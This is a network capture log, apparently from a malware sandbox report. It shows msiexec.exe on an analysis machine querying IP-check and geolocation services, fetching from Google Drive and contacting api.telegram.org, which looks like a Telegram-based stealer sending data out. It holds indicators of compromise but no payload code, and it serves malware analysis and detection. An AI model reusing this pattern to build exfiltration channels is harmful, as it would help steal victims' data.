                                                                                                                  Jan 10, 2025 17:09:15.919348001 CET44349984104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.015197039 CET44349984104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.015264034 CET44349984104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.015326023 CET49984443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.020114899 CET49984443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.083961964 CET4998380192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:16.088887930 CET8049983158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.246877909 CET8049983158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.329963923 CET49985443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.330018997 CET44349985104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.330104113 CET49985443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.337181091 CET49985443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.337193966 CET44349985104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.346143007 CET4998380192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:16.806668997 CET44349985104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.808370113 CET49985443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.808384895 CET44349985104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.958466053 CET44349985104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.958549976 CET44349985104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.958594084 CET49985443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.959609032 CET49985443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:16.966958046 CET4998380192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:16.968759060 CET4998680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:16.972625971 CET8049983158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.972700119 CET4998380192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:16.973573923 CET8049986158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:16.973642111 CET4998680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:16.973779917 CET4998680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:16.979023933 CET8049986158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:17.539443970 CET8049986158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:17.539679050 CET4998680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:17.540901899 CET49987443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:17.540947914 CET44349987104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:17.541014910 CET49987443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:17.541294098 CET49987443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:17.541302919 CET44349987104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:17.544759035 CET8049986158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:17.544830084 CET4998680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:18.028744936 CET44349987104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.030750036 CET49987443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:18.030786991 CET44349987104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.167484999 CET44349987104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.167558908 CET44349987104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.167664051 CET49987443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:18.168708086 CET49987443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:18.175555944 CET4998880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:18.180350065 CET8049988158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.180722952 CET4998880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:18.180881977 CET4998880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:18.185611963 CET8049988158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.782689095 CET8049988158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.784143925 CET49989443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:18.784193039 CET44349989104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.784257889 CET49989443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:18.784554958 CET49989443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:18.784568071 CET44349989104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:18.830514908 CET4998880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:19.282058954 CET44349989104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:19.283946037 CET49989443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:19.283988953 CET44349989104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:19.414200068 CET44349989104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:19.414370060 CET44349989104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:19.414452076 CET49989443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:19.414833069 CET49989443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:19.418560028 CET4998880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:19.419692993 CET4999080192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:19.423573971 CET8049988158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:19.423640966 CET4998880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:19.424634933 CET8049990158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:19.424738884 CET4999080192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:19.424822092 CET4999080192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:19.429558039 CET8049990158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:20.918354988 CET8049990158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:20.920967102 CET49991443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:20.921006918 CET44349991104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:20.921082020 CET49991443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:20.921727896 CET49991443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:20.921744108 CET44349991104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:20.971271038 CET4999080192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:21.386110067 CET44349991104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:21.387900114 CET49991443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:21.387936115 CET44349991104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:21.545782089 CET44349991104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:21.545872927 CET44349991104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:21.546024084 CET49991443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:21.546762943 CET49991443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:21.550523043 CET4999080192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:21.551805973 CET4999280192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:21.556305885 CET8049990158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:21.556385994 CET4999080192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:21.557970047 CET8049992158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:21.558078051 CET4999280192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:21.558166981 CET4999280192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:21.564066887 CET8049992158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.147300959 CET8049992158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.148762941 CET49993443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:22.148813009 CET44349993104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.148978949 CET49993443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:22.149219990 CET49993443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:22.149234056 CET44349993104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.189944983 CET4999280192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:22.609638929 CET44349993104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.611345053 CET49993443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:22.611360073 CET44349993104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.740648031 CET44349993104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.740716934 CET44349993104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.740928888 CET49993443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:22.741530895 CET49993443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:22.746511936 CET4999280192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:22.748373032 CET4999480192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:22.751794100 CET8049992158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.751903057 CET4999280192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:22.753568888 CET8049994158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:22.753696918 CET4999480192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:22.753762007 CET4999480192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:22.759129047 CET8049994158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:24.728072882 CET8049994158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:24.730231047 CET49995443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:24.730271101 CET44349995104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:24.730355978 CET49995443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:24.730631113 CET49995443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:24.730643988 CET44349995104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:24.783647060 CET4999480192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:25.221252918 CET44349995104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:25.223268032 CET49995443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:25.223289013 CET44349995104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:25.375710964 CET44349995104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:25.375799894 CET44349995104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:25.375847101 CET49995443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:25.376312971 CET49995443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:25.380705118 CET4999480192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:25.381931067 CET4999680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:25.385749102 CET8049994158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:25.385804892 CET4999480192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:25.386765957 CET8049996158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:25.386851072 CET4999680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:25.386934042 CET4999680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:25.391691923 CET8049996158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:26.979806900 CET8049996158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:26.981242895 CET49997443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:26.981276989 CET44349997104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:26.981359959 CET49997443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:26.981631041 CET49997443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:26.981646061 CET44349997104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:27.037533045 CET4999680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:27.466599941 CET44349997104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:27.468471050 CET49997443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:27.468494892 CET44349997104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:27.623306990 CET44349997104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:27.623405933 CET44349997104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:27.623508930 CET49997443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:27.624038935 CET49997443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:27.627280951 CET4999680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:27.628621101 CET4999880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:27.633085966 CET8049996158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:27.633186102 CET4999680192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:27.633384943 CET8049998158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:27.633490086 CET4999880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:27.633630037 CET4999880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:27.638365030 CET8049998158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.215542078 CET8049998158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.217119932 CET49999443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:28.217144012 CET44349999104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.217214108 CET49999443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:28.217487097 CET49999443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:28.217495918 CET44349999104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.268085003 CET4999880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:28.692925930 CET44349999104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.696043968 CET49999443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:28.696079016 CET44349999104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.856260061 CET44349999104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.856338024 CET44349999104.21.80.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.856395960 CET49999443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:28.857491970 CET49999443192.168.2.11104.21.80.1
                                                                                                                  Jan 10, 2025 17:09:28.886244059 CET4999880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:28.891294003 CET8049998158.101.44.242192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.891369104 CET4999880192.168.2.11158.101.44.242
                                                                                                                  Jan 10, 2025 17:09:28.894166946 CET50000443192.168.2.11149.154.167.220
                                                                                                                  Jan 10, 2025 17:09:28.894211054 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.894278049 CET50000443192.168.2.11149.154.167.220
                                                                                                                  Jan 10, 2025 17:09:28.894742966 CET50000443192.168.2.11149.154.167.220
                                                                                                                  Jan 10, 2025 17:09:28.894762993 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:29.532850981 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:29.532944918 CET50000443192.168.2.11149.154.167.220
                                                                                                                  Jan 10, 2025 17:09:29.534951925 CET50000443192.168.2.11149.154.167.220
                                                                                                                  Jan 10, 2025 17:09:29.534960032 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:29.535367012 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:29.537040949 CET50000443192.168.2.11149.154.167.220
                                                                                                                  Jan 10, 2025 17:09:29.583326101 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:29.775160074 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:29.775243044 CET44350000149.154.167.220192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:29.775346041 CET50000443192.168.2.11149.154.167.220
                                                                                                                  Jan 10, 2025 17:09:29.781028032 CET50000443192.168.2.11149.154.167.220
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 17:09:08.380151987 CET6155753192.168.2.111.1.1.1
                                                                                                                  Jan 10, 2025 17:09:08.387553930 CET53615571.1.1.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.549990892 CET5930853192.168.2.111.1.1.1
                                                                                                                  Jan 10, 2025 17:09:09.557679892 CET53593081.1.1.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:14.028420925 CET5054753192.168.2.111.1.1.1
                                                                                                                  Jan 10, 2025 17:09:14.036405087 CET53505471.1.1.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:15.372720003 CET6310153192.168.2.111.1.1.1
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET53631011.1.1.1192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:28.886966944 CET6220153192.168.2.111.1.1.1
                                                                                                                  Jan 10, 2025 17:09:28.893620968 CET53622011.1.1.1192.168.2.11
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 17:09:08.380151987 CET192.168.2.111.1.1.10xf351Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:09.549990892 CET192.168.2.111.1.1.10xc364Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:14.028420925 CET192.168.2.111.1.1.10xee1cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.372720003 CET192.168.2.111.1.1.10x3a24Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:28.886966944 CET192.168.2.111.1.1.10xe205Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 17:09:08.387553930 CET1.1.1.1192.168.2.110xf351No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:09.557679892 CET1.1.1.1192.168.2.110xc364No error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:14.036405087 CET1.1.1.1192.168.2.110xee1cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:14.036405087 CET1.1.1.1192.168.2.110xee1cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:14.036405087 CET1.1.1.1192.168.2.110xee1cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:14.036405087 CET1.1.1.1192.168.2.110xee1cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:14.036405087 CET1.1.1.1192.168.2.110xee1cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:14.036405087 CET1.1.1.1192.168.2.110xee1cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET1.1.1.1192.168.2.110x3a24No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET1.1.1.1192.168.2.110x3a24No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET1.1.1.1192.168.2.110x3a24No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET1.1.1.1192.168.2.110x3a24No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET1.1.1.1192.168.2.110x3a24No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET1.1.1.1192.168.2.110x3a24No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:15.380381107 CET1.1.1.1192.168.2.110x3a24No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 17:09:28.893620968 CET1.1.1.1192.168.2.110xe205No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  • drive.google.com
                                                                                                                  • drive.usercontent.google.com
                                                                                                                  • reallyfreegeoip.org
                                                                                                                  • api.telegram.org
                                                                                                                  • checkip.dyndns.org
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.1149983158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:14.048603058 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 17:09:14.633600950 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:14 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 3aa830a6b52afa1a38e164610f0f80d8
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 10, 2025 17:09:14.639636993 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 17:09:14.802612066 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:14 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 9fc6da089ba716ef6fc9daae6c03afc3
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                  Jan 10, 2025 17:09:16.083961964 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 17:09:16.246877909 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:16 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 2cbc2bbaf18a939096f026e85a831c2e
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.1149986158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:16.973779917 CET127OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 17:09:17.539443970 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:17 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Request-ID: 99ff5bb9292bfa9d3f84966fb018969b
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.1149988158.101.44.242801480C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 10, 2025 17:09:18.180881977 CET151OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 10, 2025 17:09:18.782689095 CET321INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 16:09:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
